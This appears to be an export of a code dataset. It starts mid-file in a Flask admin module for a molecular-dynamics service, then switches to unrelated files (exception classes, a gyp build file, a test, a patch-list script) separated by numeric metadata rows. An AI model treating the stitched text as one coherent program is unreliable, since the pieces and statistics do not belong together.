        server.sendmail("labioquim.rondonia.fiocruz@gmail.com", email, message)
    flash('User registration request {} removed successfully. '.format(UserData.username), 'primary')
    return redirect(url_for('admin_cadastros_en'))
############################
########## admin edit br ###########
@app.route('/admin/edit/<int:id>', methods=['GET', 'POST'])
@admin_required
def edit_user(id):
    """Admin user-editing page (pt-BR).

    GET: renders the edit form for the user.
    POST: updates name/username/e-mail; the password is changed only when
    both password fields are non-empty and match. Falls through to an
    error flash when the password fields disagree.
    """
    if request.method == 'POST':
        name = request.form.get('name')
        user = request.form.get('username')
        email = request.form.get('email')
        password = request.form.get('password')
        passconfirm = request.form.get('passwordconfirm')
        if password == '' and passconfirm == '':
            # Both password fields empty: update profile data only.
            UserData = User.query.get(int(id))
            UserData.name = name
            UserData.username = user
            UserData.email = email
            try:
                db.session.add(UserData)
                db.session.commit()
                flash('Dados do(a) usuário(a) {} alterados com sucesso.'.format(user), 'primary')
                return redirect(url_for('admin'))
            # FIX: narrow the bare 'except:' (it also swallowed
            # SystemExit/KeyboardInterrupt) and roll the session back so a
            # failed commit does not poison later requests.
            except Exception:
                db.session.rollback()
                flash('Erro, email ou usuário já estão sendo utilizados.', 'danger')
                return redirect(url_for('edit_user', id=id))
        elif password == passconfirm:
            # Matching passwords supplied: update profile data and password.
            UserData = User.query.get(int(id))
            UserData.name = name
            UserData.username = user
            UserData.email = email
            try:
                UserData.set_password(password)
                db.session.add(UserData)
                db.session.commit()
                flash('Dados do(a) usuário(a) {} alterados com sucesso.'.format(user), 'primary')
                return redirect(url_for('admin'))
            except Exception:
                db.session.rollback()
                flash('Erro, email ou usuário já estão sendo utilizados.', 'danger')
                return redirect(url_for('edit_user', id=id))
        # Password fields disagree.
        flash('Erro ao editar usuário(a) {}.'.format(user), 'danger')
        return redirect(url_for('admin'))
    UserData = User.query.get(int(id))
    return render_template('edit_user.html', UserData=UserData)
#########################
###### admin edit en #############
@app.route('/admin/edit_en/<int:id>', methods=['GET', 'POST'])
@admin_required
def edit_user_en(id):
    """Admin user-editing page (English).

    GET: renders the edit form for the user.
    POST: updates name/username/e-mail; the password is changed only when
    both password fields are non-empty and match. Falls through to an
    error flash when the password fields disagree.
    """
    if request.method == 'POST':
        name = request.form.get('name')
        user = request.form.get('username')
        email = request.form.get('email')
        password = request.form.get('password')
        passconfirm = request.form.get('passwordconfirm')
        if password == '' and passconfirm == '':
            # Both password fields empty: update profile data only.
            UserData = User.query.get(int(id))
            UserData.name = name
            UserData.username = user
            UserData.email = email
            try:
                db.session.add(UserData)
                db.session.commit()
                flash('User data {} changed successfully. '.format(user), 'primary')
                return redirect(url_for('admin_en'))
            # FIX: narrow the bare 'except:' (it also swallowed
            # SystemExit/KeyboardInterrupt) and roll the session back so a
            # failed commit does not poison later requests.
            except Exception:
                db.session.rollback()
                flash('Error, email or user are already being used.', 'danger')
                return redirect(url_for('edit_user_en', id=id))
        elif password == passconfirm:
            # Matching passwords supplied: update profile data and password.
            UserData = User.query.get(int(id))
            UserData.name = name
            UserData.username = user
            UserData.email = email
            try:
                UserData.set_password(password)
                db.session.add(UserData)
                db.session.commit()
                flash('User data {} changed successfully.'.format(user), 'primary')
                return redirect(url_for('admin_en'))
            except Exception:
                db.session.rollback()
                flash('Error, email or user are already being used.', 'danger')
                return redirect(url_for('edit_user_en', id=id))
        # Password fields disagree.
        flash('Error editing user {}.'.format(user), 'danger')
        return redirect(url_for('admin_en'))
    UserData = User.query.get(int(id))
    return render_template('edit_user_en.html', UserData=UserData)
############################
##### admin newUser br ########
@app.route('/admin/newUser', methods=['GET', 'POST'], endpoint='newUser')
@admin_required
def newuser():
    """Admin page to create a new, pre-activated user (pt-BR)."""
    if request.method == 'POST':
        name = request.form.get('name')
        user = request.form.get('username')
        email = request.form.get('email')
        password = request.form.get('password')
        passconfirm = request.form.get('passwordconfirm')
        # BUG FIX: the confirmation field was read but never checked, so a
        # typo in either field silently created the account anyway.
        if password != passconfirm:
            flash('Erro, as senhas informadas não coincidem.', 'danger')
            return redirect(url_for('newUser'))
        # Check whether the username or e-mail is already taken.
        check_email = User.query.filter(User.email == email).first()
        check_user = User.query.filter(User.username == user).first()
        if check_email is None and check_user is None:
            new = User(name=name,username=user,email=email,register='True')
            new.set_password(password)
            db.session.add(new)
            db.session.commit()
            flash('Cadastro do(a) Usuário(a) {} realizado com sucesso.'.format(user), 'primary')
            return redirect(url_for('admin'))
        else:
            # BUG FIX: this redirect used url_for('newuser'), but the route
            # is registered under endpoint='newUser' (case-sensitive), so
            # the error path raised BuildError instead of redirecting.
            flash('Erro, email ou usuário já estão sendo utilizados.', 'danger')
            return redirect(url_for('newUser'))
    return render_template('new_user.html')
#################################
####### admin newUser en #######
@app.route('/admin/newUser_en', methods=['GET', 'POST'], endpoint='newUser_en')
@admin_required
def newuser_en():
    """Admin page to create a new, pre-activated user (English)."""
    if request.method == 'POST':
        name = request.form.get('name')
        user = request.form.get('username')
        email = request.form.get('email')
        password = request.form.get('password')
        passconfirm = request.form.get('passwordconfirm')
        # BUG FIX: the confirmation field was read but never checked, so a
        # typo in either field silently created the account anyway.
        if password != passconfirm:
            flash('Error, the passwords do not match.', 'danger')
            return redirect(url_for('newUser_en'))
        # Check whether the username or e-mail is already taken.
        check_email = User.query.filter(User.email == email).first()
        check_user = User.query.filter(User.username == user).first()
        if check_email is None and check_user is None:
            new = User(name=name,username=user,email=email,register='True')
            new.set_password(password)
            db.session.add(new)
            db.session.commit()
            flash('User registration {} carried out successfully.'.format(user), 'primary')
            return redirect(url_for('admin_en'))
        else:
            # BUG FIX: this redirect used url_for('newuser_en'), but the
            # route is registered under endpoint='newUser_en'
            # (case-sensitive), so the error path raised BuildError.
            flash('Error, email or user are already being used.', 'danger')
            return redirect(url_for('newUser_en'))
    return render_template('new_user_en.html')
################################
##############admin limpar pasta##########
@app.route('/admin/limpar/<int:id>')
@admin_required
def cleanfolder(id):
    """Wipe a user's upload folder: remove the tree and recreate it empty."""
    UserData = User.query.get(int(id))
    user = UserData.username
    path = Config.UPLOAD_FOLDER + user
    if os.path.exists(path):
        try:
            shutil.rmtree(path)
        except OSError as e:
            flash("Error: %s - %s " % (e.filename, e.strerror))
    try:
        os.mkdir(path)
    except FileExistsError as e:
        # BUG FIX: the message was a plain string containing the literal
        # text '{path}' — the 'f' prefix was missing, so the path never
        # appeared in the flash.
        flash(f'Pasta {path} já existe.')
    flash('Os Arquivos na pasta {} foram apagados com sucesso.'.format(user), 'primary')
    return redirect(url_for('admin'))
##############################################
##### admin remove br ######
@app.route('/admin/remove/<int:id>')
@admin_required
def removeuser(id):
    """Delete a user account; the 'admin' account itself is protected."""
    UserData = User.query.get(int(id))
    # Guard clause: never delete the admin account.
    if UserData.username == 'admin':
        flash('Não é possível remover o admin', 'danger')
        return redirect(url_for('admin'))
    db.session.delete(UserData)
    db.session.commit()
    flash('Usuário(a) {} removido(a) com sucesso.'.format(UserData.username), 'primary')
    return redirect(url_for('admin'))
############################
#### admin edit-md br ####
@app.route('/admin/edit-md', methods = ['GET', 'POST'])
@admin_required
def edit_md():
    """Admin page (pt-BR) to view/edit 'nsteps' and 'dt' in md_pr.mdp.

    POST rewrites the matching lines in place; GET parses the current
    values and shows them in the form.
    NOTE(review): matching is by substring ('nsteps'/'dt' anywhere in the
    line) and the whole file is rewritten once per match — fragile if the
    .mdp ever contains another parameter whose name includes 'dt'; confirm.
    """
    os.chdir(Config.MDP_LOCATION_FOLDER)
    # POST: change the nsteps/dt values inside the md_pr.mdp file.
    if request.method == 'POST':
        new_nsteps = request.form.get('editnstep')
        new_dt = request.form.get('editDt')
        archive = open("md_pr.mdp","r")
        file = archive.readlines()
        # Replace the nsteps line.
        for i, text in enumerate(file):
            if text.find('nsteps') > -1:
                # Reopening in 'w' truncates; writelines rewrites the whole file.
                archive = open("md_pr.mdp","w")
                # Replace the entire nsteps line.
                file[i] = "nsteps = "+ new_nsteps +" ; 2 * 50000 = 1000 ps (1 ns) \n"
                archive.writelines(file)
        # Replace the dt (timestep) line.
        for i, text in enumerate(file):
            if text.find('dt') > -1:
                archive = open("md_pr.mdp","w")
                # Replace the entire dt line.
                file[i] = "dt = "+ new_dt +" ; 2 fs \n"
                archive.writelines(file)
        flash('atualização realizada com sucesso.', 'primary')
        return redirect(url_for('admin'))
    # GET: read the current nsteps value to display to the user.
    # i is the index (position) of the '= ' separator within the line.
    try:
        archive = open("md_pr.mdp","r")
    except:
        flash('Ocorreu um erro ao localizar arquivo, tente novamente mais tarde.', 'danger')
        return redirect(url_for('admin'))
    file = archive.readlines()
    # Parse the current nsteps value.
    # NOTE(review): if no line matches, 'nsteps' (or 'dt' below) is never
    # bound and the render_template call raises NameError — confirm the
    # file always contains both keys.
    for text in file:
        if text.find('nsteps') > -1:
            i = text.find('= ')
            i+=2
            text = text[i:].split(';')
            nsteps = text[0]
            nsteps = int(nsteps)
    # Parse the current dt value.
    for text in file:
        if text.find('dt') > -1:
            i = text.find('= ')
            i+=2
            text = text[i:].split(';')
            dt = text[0]
            dt = float(dt)
    archive.close()
    return render_template('edit_md.html', nsteps = nsteps, dt = dt)
##############################
##### admin edit-md en ######
@app.route('/admin/edit-md_en', methods = ['GET', 'POST'])
@admin_required
def edit_md_en():
    """Admin page (English) to view/edit 'nsteps' and 'dt' in md_pr.mdp.

    Mirrors edit_md(); POST rewrites the matching lines in place, GET
    parses the current values for the form.
    NOTE(review): substring matching plus full-file rewrites per match —
    fragile if another parameter name contains 'dt'; confirm.
    """
    os.chdir(Config.MDP_LOCATION_FOLDER)
    # POST: change the nsteps/dt values inside the md_pr.mdp file.
    if request.method == 'POST':
        new_nsteps = request.form.get('editnstep')
        new_dt = request.form.get('editDt')
        archive = open("md_pr.mdp","r")
        file = archive.readlines()
        # Replace the nsteps line.
        for i, text in enumerate(file):
            if text.find('nsteps') > -1:
                # Reopening in 'w' truncates; writelines rewrites the whole file.
                archive = open("md_pr.mdp","w")
                # Replace the entire nsteps line.
                file[i] = "nsteps = "+ new_nsteps +" ; 2 * 50000 = 1000 ps (1 ns) \n"
                archive.writelines(file)
        # Replace the dt (timestep) line.
        for i, text in enumerate(file):
            if text.find('dt') > -1:
                archive = open("md_pr.mdp","w")
                # Replace the entire dt line.
                file[i] = "dt = "+ new_dt +" ; 2 fs \n"
                archive.writelines(file)
        flash('update performed successfully.', 'primary')
        return redirect(url_for('admin_en'))
    # GET: read the current nsteps value to display to the user.
    # i is the index (position) of the '= ' separator within the line.
    try:
        archive = open("md_pr.mdp","r")
    except:
        flash('There was an error locating file, please try again later.', 'danger')
        return redirect(url_for('admin_en'))
    file = archive.readlines()
    # Parse the current nsteps value.
    # NOTE(review): if no line matches, 'nsteps' (or 'dt' below) stays
    # unbound and render_template raises NameError — confirm the file
    # always contains both keys.
    for text in file:
        if text.find('nsteps') > -1:
            i = text.find('= ')
            i+=2
            text = text[i:].split(';')
            nsteps = text[0]
            nsteps = int(nsteps)
    # Parse the current dt value.
    for text in file:
        if text.find('dt') > -1:
            i = text.find('= ')
            i+=2
            text = text[i:].split(';')
            dt = text[0]
            dt = float(dt)
    archive.close()
    return render_template('edit_md_en.html', nsteps = nsteps, dt = dt)
###############################
##### admin current dynamics br ########
@app.route('/admin/current-dynamics', methods=['GET', 'POST'])
@admin_required
def current_dynamics():
    """Admin overview (pt-BR) of every dynamics currently running.

    Scans each user folder under UPLOAD_FOLDER, reading the 'executing'
    (free enzyme) or 'executingLig' (enzyme + ligand) lock file to build a
    list of {username, name_dynamic, date_finish} dicts for the template.
    NOTE(review): the per-folder bare 'except:' silently skips users whose
    lock/log files are missing or empty; the outer one treats any listing
    failure as "nothing running" — confirm this catch-all is intentional.
    """
    # List of dynamics currently in progress.
    list_dynamics = list()
    try:
        # List the users' folders.
        list_directory = os.listdir(Config.UPLOAD_FOLDER)
        # Sort the folder list alphabetically.
        list_directory.sort()
        for pasta in list_directory:
            try:
                directory = Config.UPLOAD_FOLDER + pasta
                # Read each user's folder and check for a dynamics in progress.
                # Free-enzyme run? (non-empty 'executing' lock file; raises if absent)
                if os.stat(directory + '/executing').st_size != 0:
                    archive = open(directory + '/executing', 'r')
                    # First line of the lock file is the username.
                    username = archive.readline()
                    archive.close()
                    # Read the dynamics name.
                    archive = open(directory + '/namedynamic.txt','r')
                    name_dynamic = archive.readline()
                    archive.close()
                    # Read the lock file again for its last (stage) line.
                    archive = open(directory + '/executing','r')
                    lines = archive.readlines()
                    archive.close()
                    last_line = lines[len(lines)-1]
                    # Has the run reached the production-MD stage?
                    if last_line == '#productionmd\n':
                        # Read the path of the execution log.
                        archive = open(directory + '/DirectoryLog', 'r')
                        directorylog = archive.readline()
                        archive.close()
                        # Read the execution log itself.
                        archive = open(directorylog,'r')
                        lines = archive.readlines()
                        archive.close()
                        # Take the last line of the log.
                        last_line = lines[len(lines)-1]
                        if last_line.find('step ') > -1:
                            # The line carries the step count and estimated finish date.
                            date_finish = last_line
                            # Build the entry shown on the front-end.
                            currentDynamics = {"username": username, "name_dynamic": name_dynamic, "date_finish":date_finish}
                            # Add it to the dynamics list.
                            list_dynamics.append(currentDynamics)
                    else:
                        # Not in production MD yet: report the current stage name instead.
                        # Build the entry shown on the front-end.
                        currentDynamics = {"username": username, "name_dynamic": name_dynamic, "date_finish":last_line}
                        # Add it to the dynamics list.
                        list_dynamics.append(currentDynamics)
                # Enzyme + ligand run? (non-empty 'executingLig' lock file)
                elif os.stat(directory + '/executingLig').st_size != 0:
                    archive = open(directory + '/executingLig', 'r')
                    # First line of the lock file is the username.
                    username = archive.readline()
                    archive.close()
                    # Read the dynamics name.
                    archive = open(directory + '/namedynamic.txt','r')
                    name_dynamic = archive.readline()
                    archive.close()
                    # Read the lock file again for its last (stage) line.
                    archive = open(directory + '/executingLig','r')
                    lines = archive.readlines()
                    archive.close()
                    last_line = lines[len(lines)-1]
                    # Has the run reached the production-MD stage?
                    if last_line == '#productionmd\n':
                        # Read the path of the execution log.
                        archive = open(directory + '/DirectoryLog', 'r')
                        directorylog = archive.readline()
                        archive.close()
                        # Read the execution log itself.
                        archive = open(directorylog,'r')
                        lines = archive.readlines()
                        archive.close()
                        # Take the last line of the log.
                        last_line = lines[len(lines)-1]
                        if last_line.find('step ') > -1:
                            # The line carries the step count and estimated finish date.
                            date_finish = last_line
                            # Build the entry shown on the front-end.
                            currentDynamics = {"username": username, "name_dynamic": name_dynamic, "date_finish":date_finish}
                            # Add it to the dynamics list.
                            list_dynamics.append(currentDynamics)
                    else:
                        # Not in production MD yet: report the current stage name instead.
                        # Build the entry shown on the front-end.
                        currentDynamics = {"username": username, "name_dynamic": name_dynamic, "date_finish":last_line}
                        # Add it to the dynamics list.
                        list_dynamics.append(currentDynamics)
            except:
                # Files missing/empty for this user: skip to the next folder.
                # (Appending an empty list is a no-op.)
                list_directory += list()
        return render_template('current_dynamics.html', currentDynamics=list_dynamics)
    except:
        flash('No momento nenhuma dinâmica está em execução.', 'danger')
        return render_template('current_dynamics.html')
###########################################
##### admin current dynamics en #########
@app.route('/admin/current-dynamics_en', methods=['GET', 'POST'])
@admin_required
def current_dynamics_en():
    """Admin view (English) listing every molecular-dynamics run currently executing.

    Scans each user folder under Config.UPLOAD_FOLDER. A non-empty 'executing'
    file marks a free-enzyme run; failing that, a non-empty 'executingLig' file
    marks an enzyme+ligand run. For each running dynamic a dict with keys
    'username', 'name_dynamic' and 'date_finish' is passed to the template.
    """
    def _entry_for(directory, status_path):
        # Build the template dict for one running dynamic, or return None when
        # the run is in #productionmd but its MD log has no 'step ' line yet.
        with open(status_path, 'r') as archive:
            status_lines = archive.readlines()
        username = status_lines[0]      # first line: owner's username
        last_line = status_lines[-1]    # last line: current stage marker
        with open(os.path.join(directory, 'namedynamic.txt'), 'r') as archive:
            name_dynamic = archive.readline()
        if last_line == '#productionmd\n':
            # Production stage: report progress from the execution log, whose
            # path is stored in the DirectoryLog file.
            with open(os.path.join(directory, 'DirectoryLog'), 'r') as archive:
                directorylog = archive.readline()
            with open(directorylog, 'r') as archive:
                log_lines = archive.readlines()
            last_line = log_lines[-1]
            if 'step ' not in last_line:
                return None
        # Before production, last_line is the name of the current stage.
        return {"username": username, "name_dynamic": name_dynamic,
                "date_finish": last_line}

    list_dynamics = []
    try:
        # One folder per user, listed in alphabetical order.
        for pasta in sorted(os.listdir(Config.UPLOAD_FOLDER)):
            directory = Config.UPLOAD_FOLDER + pasta
            try:
                entry = None
                if os.stat(os.path.join(directory, 'executing')).st_size != 0:
                    entry = _entry_for(directory, os.path.join(directory, 'executing'))
                elif os.stat(os.path.join(directory, 'executingLig')).st_size != 0:
                    entry = _entry_for(directory, os.path.join(directory, 'executingLig'))
                if entry is not None:
                    list_dynamics.append(entry)
            except Exception:
                # Folder without (or with unreadable) status files: skip it and
                # move on to the next user, mirroring the original best-effort scan.
                continue
        return render_template('current_dynamics_en.html', currentDynamics=list_dynamics)
    except Exception:
        flash('No dynamics are currently running.', 'danger')
        return render_template('current_dynamics_en.html')
#########################################
| 46.379288
| 173
| 0.55822
| 7,255
| 70,311
| 5.311234
| 0.070159
| 0.026263
| 0.033426
| 0.029585
| 0.886643
| 0.852049
| 0.835388
| 0.81717
| 0.804998
| 0.801676
| 0
| 0.00419
| 0.314375
| 70,311
| 1,516
| 174
| 46.379288
| 0.795133
| 0.088734
| 0
| 0.792469
| 0
| 0.001751
| 0.159132
| 0.013335
| 0
| 0
| 0
| 0.00066
| 0
| 1
| 0.035902
| false
| 0.021891
| 0.019264
| 0.000876
| 0.147986
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0be8c5a594400e0c6dfa6f29e116f294e2ed99a4
| 302
|
py
|
Python
|
server/fb_folder/fb_exception.py
|
dundarahmet/plc_firebase_server
|
0ebf1093468174c4079c8faa4651181e1298f5f6
|
[
"Apache-2.0"
] | null | null | null |
server/fb_folder/fb_exception.py
|
dundarahmet/plc_firebase_server
|
0ebf1093468174c4079c8faa4651181e1298f5f6
|
[
"Apache-2.0"
] | null | null | null |
server/fb_folder/fb_exception.py
|
dundarahmet/plc_firebase_server
|
0ebf1093468174c4079c8faa4651181e1298f5f6
|
[
"Apache-2.0"
] | null | null | null |
class SecurityKeyError(Exception):
    """Raised when a security-key related operation fails.

    The original ``__init__(self, message)`` only forwarded to
    ``super().__init__(message)``, which is exactly what ``Exception``
    already does — so the override is dropped. Callers still construct
    it as ``SecurityKeyError(message)``.
    """
class ListenError(Exception):
    """Raised when a listen operation fails.

    The original ``__init__(self, message)`` only forwarded to
    ``super().__init__(message)`` — identical to ``Exception``'s own
    behavior — so the redundant override is removed. The constructor
    signature seen by callers is unchanged.
    """
class ChildError(Exception):
    """Raised when a child-node related operation fails.

    The original ``__init__(self, message)`` only forwarded to
    ``super().__init__(message)`` — identical to ``Exception``'s own
    behavior — so the redundant override is removed. The constructor
    signature seen by callers is unchanged.
    """
| 17.764706
| 34
| 0.678808
| 30
| 302
| 6.033333
| 0.333333
| 0.198895
| 0.265193
| 0.331492
| 0.767956
| 0.767956
| 0.767956
| 0.767956
| 0.530387
| 0
| 0
| 0
| 0.201987
| 302
| 16
| 35
| 18.875
| 0.751037
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
0408758e91d3409bf81e615ec36589c3e15d1e24
| 1,338
|
gyp
|
Python
|
binding.gyp
|
evanlucas/node-lz4
|
1bcb05f952275e3d78f75c51b4b1e30eca200553
|
[
"MIT"
] | 1
|
2022-01-25T04:16:21.000Z
|
2022-01-25T04:16:21.000Z
|
binding.gyp
|
evanlucas/node-lz4
|
1bcb05f952275e3d78f75c51b4b1e30eca200553
|
[
"MIT"
] | null | null | null |
binding.gyp
|
evanlucas/node-lz4
|
1bcb05f952275e3d78f75c51b4b1e30eca200553
|
[
"MIT"
] | null | null | null |
{
  # GYP build file: builds two native Node.js addons from the bundled lz4 sources.
  'targets': [
    {
      # xxHash checksum addon.
      'target_name': 'xxhash',
      # node-gyp disables C++ exceptions by default; strip that flag and
      # re-enable exceptions on every toolchain (gcc/clang, Xcode, MSVC).
      'cflags!': [ '-fno-exceptions' ],
      'cflags_cc!': [ '-fno-exceptions' ],
      'xcode_settings': { 'GCC_ENABLE_CPP_EXCEPTIONS': 'YES',
        'CLANG_CXX_LIBRARY': 'libc++',
        'MACOSX_DEPLOYMENT_TARGET': '10.7',
      },
      'msvs_settings': {
        'VCCLCompilerTool': { 'ExceptionHandling': 1 },
      },
      # Binding glue plus the vendored xxhash sources.
      'sources': [
        'lib/binding/xxhash_binding.cc',
        'deps/lz4/lib/xxhash.h',
        'deps/lz4/lib/xxhash.c',
      ],
      # Resolve node-addon-api headers at gyp time via a node one-liner.
      'include_dirs': [
        '<!(node -p "require(\'node-addon-api\').include_dir")',
      ],
      'cflags': [ '-O3' ],
    },
    {
      # LZ4 compression addon (includes the high-compression lz4hc variant).
      'target_name': 'lz4',
      # Same exception-handling re-enable as the xxhash target above.
      'cflags!': [ '-fno-exceptions' ],
      'cflags_cc!': [ '-fno-exceptions' ],
      'xcode_settings': { 'GCC_ENABLE_CPP_EXCEPTIONS': 'YES',
        'CLANG_CXX_LIBRARY': 'libc++',
        'MACOSX_DEPLOYMENT_TARGET': '10.7',
      },
      'msvs_settings': {
        'VCCLCompilerTool': { 'ExceptionHandling': 1 },
      },
      # Binding glue plus the vendored lz4 + lz4hc sources.
      'sources': [
        'lib/binding/lz4_binding.cc',
        'deps/lz4/lib/lz4.h',
        'deps/lz4/lib/lz4.c',
        'deps/lz4/lib/lz4hc.h',
        'deps/lz4/lib/lz4hc.c',
      ],
      # Resolve node-addon-api headers at gyp time via a node one-liner.
      'include_dirs': [
        '<!(node -p "require(\'node-addon-api\').include_dir")',
      ],
      'cflags': [ '-O3' ],
    },
  ],
}
| 27.306122
| 64
| 0.494021
| 129
| 1,338
| 4.906977
| 0.333333
| 0.066351
| 0.094787
| 0.052133
| 0.815166
| 0.755134
| 0.755134
| 0.755134
| 0.755134
| 0.755134
| 0
| 0.023182
| 0.290732
| 1,338
| 48
| 65
| 27.875
| 0.643836
| 0
| 0
| 0.5625
| 0
| 0
| 0.53139
| 0.14574
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f0aed59548f9a49cf5463bd560d2c1ecae74dde1
| 140
|
py
|
Python
|
examples/docs_snippets/docs_snippets_tests/concepts_tests/assets_tests/test_asset_io_manager.py
|
silentsokolov/dagster
|
510bf07bf6906294d5a239d60079c88211002ebf
|
[
"Apache-2.0"
] | null | null | null |
examples/docs_snippets/docs_snippets_tests/concepts_tests/assets_tests/test_asset_io_manager.py
|
silentsokolov/dagster
|
510bf07bf6906294d5a239d60079c88211002ebf
|
[
"Apache-2.0"
] | null | null | null |
examples/docs_snippets/docs_snippets_tests/concepts_tests/assets_tests/test_asset_io_manager.py
|
silentsokolov/dagster
|
510bf07bf6906294d5a239d60079c88211002ebf
|
[
"Apache-2.0"
] | null | null | null |
from docs_snippets.concepts.assets.asset_io_manager import assets_with_io_manager
def test():
assert len(assets_with_io_manager) == 2
| 23.333333
| 81
| 0.814286
| 22
| 140
| 4.772727
| 0.681818
| 0.257143
| 0.228571
| 0.361905
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008065
| 0.114286
| 140
| 5
| 82
| 28
| 0.83871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
f0d06f6ddd1b7cd8772cda7887dd6c65e59eae6f
| 15,518
|
py
|
Python
|
bin/gen_list.py
|
yux94/Pathology
|
5a145b5ee106d32b08dbce57f395f4d62e5ece06
|
[
"RSA-MD"
] | 3
|
2018-12-06T04:18:42.000Z
|
2022-03-09T00:58:57.000Z
|
bin/gen_list.py
|
yux94/Pathology
|
5a145b5ee106d32b08dbce57f395f4d62e5ece06
|
[
"RSA-MD"
] | 1
|
2019-06-24T06:46:36.000Z
|
2019-06-24T06:46:36.000Z
|
bin/gen_list.py
|
yux94/Pathology
|
5a145b5ee106d32b08dbce57f395f4d62e5ece06
|
[
"RSA-MD"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 17 20:52:34 2018
@author: SENSETIME\yuxian
"""
import os
import random
import numpy as np
from PIL import Image
def filter_50percent_pixel(mask):
    """Classify a mask patch as tumor based on its tumor-pixel fraction.

    In the mask, zero-valued pixels are the tumor region. The patch counts as
    tumor when tumor pixels cover at least half of it; strictly more than 50%
    non... i.e. when the zero fraction exceeds 0.5 the patch is NOT tumor.

    :param mask: numpy array (any shape) with 0.0 marking tumor pixels
    :return: True when the zero-pixel fraction is <= 0.5 (tumor patch),
             False otherwise — same boundary as the original ``> 0.5`` test.
    """
    # np.mean of the boolean mask equals np.sum(...)/float(mask.size);
    # bool() keeps the original plain-Python-bool return type.
    return bool(np.mean(mask == 0.0) <= 0.5)
if __name__ == '__main__':
    # Pixel-level split of the TUMOR_TRAIN mask patches: a patch whose tumor
    # region covers at least half its pixels is listed as tumor, otherwise as
    # normal (see filter_50percent_pixel). All NORMAL_TRAIN patches are normal.
    # NOTE(review): several hundred lines of commented-out variants (VALID
    # splits, jpeg-mask lists, txt shuffling) were removed as dead code; the
    # active logic below is unchanged.
    mask_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/1024/PATCHES_TUMOR_TRAIN/mask_HZQ_png/'
    tumor_list = []
    normal_list = []
    for file_ in os.listdir(mask_folder):
        if '.png' in file_:
            mask = Image.open(os.path.join(mask_folder, file_))
            if filter_50percent_pixel(np.asarray(mask)):  # tumor region
                tumor_list.append(os.path.join(mask_folder, file_))
            else:
                normal_list.append(os.path.join(mask_folder, file_))

    mask_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/1024/PATCHES_NORMAL_TRAIN/mask_HZQ_png/'
    for file_ in os.listdir(mask_folder):
        if '.png' in file_:
            normal_list.append(os.path.join(mask_folder, file_))

    def _write_pair_list(txt_path, mask_paths):
        # Shuffle the mask paths in place, then write one line per patch:
        # "<patch .jpeg path>,<mask .png path>". The patch path is derived
        # from the mask path by dropping the 'mask_HZQ_png' folder and the
        # '.png' suffix — same derivation the original loop performed.
        random.shuffle(mask_paths)
        with open(txt_path, "w") as f:
            for mask_path in mask_paths:
                filename = mask_path.split('/')[-1][:-4]
                patchpath = '/'.join(mask_path.split('/')[:-2])
                line = patchpath + '/' + filename + '.jpeg,' + mask_path
                f.write(line + '\n')
                print(line)

    _write_pair_list(
        "/mnt/lustre/yuxian/Code/NCRF-master/Data/txt_png_mask/pixel/Train_tumor.txt",
        tumor_list)
    _write_pair_list(
        "/mnt/lustre/yuxian/Code/NCRF-master/Data/txt_png_mask/pixel/Train_normal.txt",
        normal_list)

    print('len(tumor_list)', len(tumor_list))
    print('len(normal_list)', len(normal_list))
| 39.892031
| 142
| 0.580423
| 1,902
| 15,518
| 4.473186
| 0.064143
| 0.067701
| 0.095205
| 0.122238
| 0.899389
| 0.890339
| 0.859191
| 0.83733
| 0.821932
| 0.805712
| 0
| 0.013182
| 0.222709
| 15,518
| 389
| 143
| 39.892031
| 0.692174
| 0.742299
| 0
| 0.28
| 0
| 0.08
| 0.188904
| 0.158357
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.08
| null | null | 0.08
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0b147e57e9e49f36d711a4f838ff66d21ac36a78
| 2,526
|
py
|
Python
|
sgld_sampler.py
|
chrku/TF2-Energy-Based-Models
|
a0712cbef86f41b48d3a645bdfc3a5c47c547cd1
|
[
"MIT"
] | 6
|
2021-02-04T17:24:32.000Z
|
2022-03-18T01:34:23.000Z
|
sgld_sampler.py
|
chrku/TF2-Energy-Based-Models
|
a0712cbef86f41b48d3a645bdfc3a5c47c547cd1
|
[
"MIT"
] | null | null | null |
sgld_sampler.py
|
chrku/TF2-Energy-Based-Models
|
a0712cbef86f41b48d3a645bdfc3a5c47c547cd1
|
[
"MIT"
] | 2
|
2021-09-22T16:22:20.000Z
|
